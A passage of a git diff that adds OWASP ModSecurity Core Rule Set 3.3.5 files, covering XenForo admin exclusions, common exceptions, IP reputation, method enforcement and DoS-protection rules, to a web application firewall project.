ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[signature],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\ + ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ + ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ + ver:'OWASP_CRS/3.3.5'" + + +# Admin edit forum notice +# POST /xf/admin.php?notices/0/save +# POST /xf/admin.php?notices/forum-name.12345/save +SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \ + "id:9006930,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ + ver:'OWASP_CRS/3.3.5'" + +# Admin batch thread update +# POST /xf/admin.php?threads/batch-update/action +SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \ + "id:9006940,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=942200;ARGS:criteria,\ + ctl:ruleRemoveTargetById=942260;ARGS:criteria,\ + ctl:ruleRemoveTargetById=942330;ARGS:criteria,\ + ctl:ruleRemoveTargetById=942340;ARGS:criteria,\ + ctl:ruleRemoveTargetById=942370;ARGS:criteria,\ + ver:'OWASP_CRS/3.3.5'" + +# Edit forum theme +# POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic +SecRule REQUEST_URI "@rx /admin\.php\?styles/" \ + "id:9006950,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=942200;ARGS:json,\ + ctl:ruleRemoveTargetById=942260;ARGS:json,\ + ctl:ruleRemoveTargetById=942300;ARGS:json,\ + ctl:ruleRemoveTargetById=942330;ARGS:json,\ + ctl:ruleRemoveTargetById=942340;ARGS:json,\ + ctl:ruleRemoveTargetById=942370;ARGS:json,\ + ctl:ruleRemoveTargetById=942440;ARGS:json,\ + ver:'OWASP_CRS/3.3.5'" + +# Set forum options +# POST /xf/admin.php?options/update +SecRule REQUEST_URI "@rx /admin\.php\?options/update" \ + "id:9006960,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\ + ver:'OWASP_CRS/3.3.5'" + +# Edit pages/templates +# POST /xf/admin.php?pages/0/save +# POST /xf/admin.php?pages/foo.12345/save +# POST /xf/admin.php?templates/foo.1234/save +SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \ + "id:9006970,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\ + ver:'OWASP_CRS/3.3.5'" + +SecMarker "END-XENFORO-ADMIN" + +SecMarker "END-XENFORO" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-905-COMMON-EXCEPTIONS.conf new file mode 100644 index 000000000..191f2ea3a --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -0,0 +1,55 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + + +# This file is used as an exception mechanism to remove common false positives +# that may be encountered. +# +# Exception for Apache SSL pinger +# +SecRule REQUEST_LINE "@streq GET /" \ + "id:905100,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-generic',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ + "t:none,\ + ctl:ruleEngine=Off,\ + ctl:auditEngine=Off" + +# +# Exception for Apache internal dummy connection +# +SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ + "id:905110,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-generic',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ + "t:none,\ + chain" + SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \ + "t:none,\ + ctl:ruleEngine=Off,\ + ctl:auditEngine=Off" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-910-IP-REPUTATION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-910-IP-REPUTATION.conf new file mode 100644 index 000000000..8f22689fb --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-910-IP-REPUTATION.conf @@ -0,0 +1,323 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ IP Reputation Block Flag Check ]=- +# +# The first check we do is to see if the client IP address has already +# been blacklisted by rules from previous requests. +# +# If the rule matches, it will do a skipAfter and pick up processing +# at the end of the request phase for actual blocking. +# +SecRule TX:DO_REPUT_BLOCK "@eq 1" \ + "id:910000,\ + phase:2,\ + block,\ + t:none,\ + msg:'Request from Known Malicious Client (Based on previous traffic violations)',\ + logdata:'Previous Block Reason: %{ip.reput_block_reason}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain,\ + skipAfter:BEGIN-REQUEST-BLOCKING-EVAL" + SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ GeoIP Checks ]=- +# +# This rule requires activating the SecGeoLookupDB directive +# in the crs-setup.conf file and specifying +# the list of blocked countries (tx.high_risk_country_codes). +# +# This rule does a GeoIP resolution on the client IP address. +# +SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \ + "id:910100,\ + phase:2,\ + block,\ + t:none,\ + msg:'Client IP is from a HIGH Risk Country Location',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule TX:REAL_IP "@geoLookup" \ + "chain" + SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + +# +# -=[ IP Reputation Checks ]=- +# +# ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert +# Ref: http://www.modsecurity.org/projects/commercial/rules/ +# +# This rule checks the client IP address against a list of recent IPs captured +# from the SpiderLabs web honeypot systems (last 48 hours). +# +#SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \ +# "id:910110,\ +# phase:2,\ +# block,\ +# t:none,\ +# msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\ +# tag:'application-multi',\ +# tag:'language-multi',\ +# tag:'platform-multi',\ +# tag:'attack-reputation-ip',\ +# tag:'paranoia-level/1',\ +# severity:'CRITICAL',\ +# setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ +# setvar:'ip.reput_block_flag=1',\ +# setvar:'ip.reput_block_reason=%{rule.msg}',\ +# expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + +# +# First check if we have already run an @rbl check for this IP by checking in IP collection. +# If we have, then skip doing another check. +# +SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \ + "id:910120,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-RBL-LOOKUP" + +# +# Check Client IP against ProjectHoneypot's HTTP Blacklist +# Ref: http://www.projecthoneypot.org/httpbl_api.php +# +# To use the blacklist, you must register for an HttpBL API Key +# and choose the traffic types to block. See section +# "Project Honey Pot HTTP Blacklist" in crs-setup.conf. +# +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey +# + +# Skip HttpBL checks if user has not defined one of the TX:block_* variables. +# This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey" +SecRule &TX:block_suspicious_ip "@eq 0" \ + "id:910130,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + chain,\ + skipAfter:END-RBL-CHECK" + SecRule &TX:block_harvester_ip "@eq 0" \ + "chain" + SecRule &TX:block_spammer_ip "@eq 0" \ + "chain" + SecRule &TX:block_search_ip "@eq 0" + +SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \ + "id:910140,\ + phase:2,\ + pass,\ + capture,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.httpbl_msg=%{tx.0}',\ + chain" + SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \ + "capture,\ + t:none,\ + setvar:'tx.httpbl_msg=%{tx.1}'" + +# The following regexs are generated based off re_operators.c +SecRule TX:block_search_ip "@eq 1" \ + "id:910150,\ + phase:2,\ + block,\ + t:none,\ + msg:'HTTP Blacklist match for search engine IP',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain,\ + skipAfter:END-RBL-CHECK" + SecRule TX:httpbl_msg "@rx Search Engine" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + setvar:'ip.previous_rbl_check=1',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ + expirevar:'ip.previous_rbl_check=86400'" + +SecRule TX:block_spammer_ip "@eq 1" \ + "id:910160,\ + phase:2,\ + block,\ + t:none,\ + msg:'HTTP Blacklist match for spammer IP',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain,\ + skipAfter:END-RBL-CHECK" + SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + setvar:'ip.previous_rbl_check=1',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ + expirevar:'ip.previous_rbl_check=86400'" + +SecRule TX:block_suspicious_ip "@eq 1" \ + "id:910170,\ + phase:2,\ + block,\ + t:none,\ + msg:'HTTP Blacklist match for suspicious IP',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain,\ + skipAfter:END-RBL-CHECK" + SecRule TX:httpbl_msg "@rx (?i)^.*? suspicious .*?$" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + setvar:'ip.previous_rbl_check=1',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ + expirevar:'ip.previous_rbl_check=86400'" + +SecRule TX:block_harvester_ip "@eq 1" \ + "id:910180,\ + phase:2,\ + block,\ + t:none,\ + msg:'HTTP Blacklist match for harvester IP',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain,\ + skipAfter:END-RBL-CHECK" + SecRule TX:httpbl_msg "@rx (?i)^.*? harvester .*?$" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + setvar:'ip.previous_rbl_check=1',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ + expirevar:'ip.previous_rbl_check=86400'" + +SecAction \ + "id:910190,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-ip',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'ip.previous_rbl_check=1',\ + expirevar:'ip.previous_rbl_check=86400'" + +SecMarker "END-RBL-LOOKUP" + +SecMarker "END-RBL-CHECK" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-910-IP-REPUTATION" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-911-METHOD-ENFORCEMENT.conf new file mode 100644 index 000000000..840fe2be5 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -0,0 +1,76 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Allowed Request Methods ]=- +# +# tx.allowed_methods is defined in the crs-setup.conf file +# +SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ + "id:911100,\ + phase:2,\ + block,\ + msg:'Method is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272/220/274',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-912-DOS-PROTECTION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-912-DOS-PROTECTION.conf new file mode 100644 index 000000000..46767c163 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-912-DOS-PROTECTION.conf @@ -0,0 +1,324 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# Anti-Automation rules to detect Denial of Service attacks. +# +# Description of mechanics: +# When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP +# address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit +# (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the +# counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period +# (TX:DOS_BURST_TIME_SLICE). +# If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag +# is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout +# period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5. +# There is a stricter sibling to this rule (912170) in paranoia level 2, where the +# burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1. +# +# The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK), +# then the request is dropped without sending a response. If this happens, then a +# counter is # raised (IP:DOS_BLOCK_COUNTER). +# When an IP address is blocked for the first time, then the blocking is reported in a +# message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds. +# When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the +# blocking is not being reported (to prevent a flood of alerts). When the flag +# (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the +# counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated +# as the first block (-> alert). +# In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting +# it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different +# variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn. +# +# Variables: +# IP:DOS_BLOCK Flag if an IP address should be blocked +# IP:DOS_BLOCK_COUNTER Counter of blocked requests +# IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds. +# IP:DOS_BURST_COUNTER Burst counter +# IP:DOS_COUNTER Request counter (static resources are ignored) +# TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons) +# TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked +# TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified +# TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst +# TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS +# +# As a precondition for these rules, please set the following three variables: +# - TX:DOS_BLOCK_TIMEOUT +# - TX:DOS_COUNTER_THRESHOLD +# - TX:DOS_BURST_TIME_SLICE +# +# And make sure that TX:STATIC_EXTENSIONS is also set. +# + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + +# +# Skip if variables defining DoS protection are not set +# +SecRule &TX:dos_burst_time_slice "@eq 0" \ + "id:912100,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain,\ + skipAfter:END-DOS-PROTECTION-CHECKS" + SecRule &TX:dos_counter_threshold "@eq 0" \ + "chain" + SecRule &TX:dos_block_timeout "@eq 0" + +SecRule &TX:dos_burst_time_slice "@eq 0" \ + "id:912110,\ + phase:5,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain,\ + skipAfter:END-DOS-PROTECTION-CHECKS" + SecRule &TX:dos_counter_threshold "@eq 0" \ + "chain" + SecRule &TX:dos_block_timeout "@eq 0" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Anti-Automation / DoS Protection : Block ]=- +# + +# +# Block and track # of requests and log +# +SecRule IP:DOS_BLOCK "@eq 1" \ + "id:912120,\ + phase:1,\ + drop,\ + msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'paranoia-level/1',\ + tag:'attack-dos',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \ + "setvar:'ip.dos_block_counter=+1',\ + setvar:'ip.dos_block_flag=1',\ + setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\ + setvar:'ip.dos_block_counter=0',\ + expirevar:'ip.dos_block_flag=60'" + + +# +# Block and track # of requests but don't log +# +SecRule IP:DOS_BLOCK "@eq 1" \ + "id:912130,\ + phase:1,\ + drop,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-dos',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'ip.dos_block_counter=+1'" + + +# +# -=[ Anti-Automation / DoS Protection: Count requests ]=- +# + +# +# Skip if we have blocked the request +# +SecRule IP:DOS_BLOCK "@eq 1" \ + "id:912140,\ + phase:5,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-dos',\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DOS-PROTECTION-CHECKS" + + +# +# DOS Counter: Count the number of requests to non-static resources +# +SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \ + "id:912150,\ + phase:5,\ + pass,\ + capture,\ + t:none,t:lowercase,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-dos',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.extension=/%{TX.1}/',\ + chain" + SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \ + "setvar:'ip.dos_counter=+1'" + + +# +# Check DOS Counter +# If the request count is greater than or equal to user settings, +# we raise the burst counter. This happens via two separate rules: +# - 912160: raise from 0 to 1 +# - 912161: raise from 1 to 2 +# +# This approach with two rules avoids raising the burst counter +# from 0 to 2 via two concurrent requests. We do not raise the +# burst counter beyond 2. +# +# +SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ + "id:912160,\ + phase:5,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-dos',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &IP:DOS_BURST_COUNTER "@eq 0" \ + "setvar:'ip.dos_burst_counter=1',\ + setvar:'!ip.dos_counter',\ + expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" + + +SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ + "id:912161,\ + phase:5,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-dos',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &IP:DOS_BURST_COUNTER "@ge 1" \ + "setvar:'ip.dos_burst_counter=2',\ + setvar:'!ip.dos_counter',\ + expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" + + +# +# Check DOS Burst Counter and set Block +# Check the burst counter - if greater than or equal to 2, then we set the IP +# block variable for a given expiry and issue an alert. +# +SecRule IP:DOS_BURST_COUNTER "@ge 2" \ + "id:912170,\ + phase:5,\ + pass,\ + t:none,\ + log,\ + msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'paranoia-level/1',\ + tag:'attack-dos',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'ip.dos_block=1',\ + expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +# +# Check DOS Burst Counter and set Block +# Check the burst counter - if greater than or equal to 1, then we set the IP +# block variable for a given expiry and issue an alert. +# +# This is a stricter sibling of rule 912170. +# +SecRule IP:DOS_BURST_COUNTER "@ge 1" \ + "id:912171,\ + phase:5,\ + pass,\ + t:none,\ + log,\ + msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + 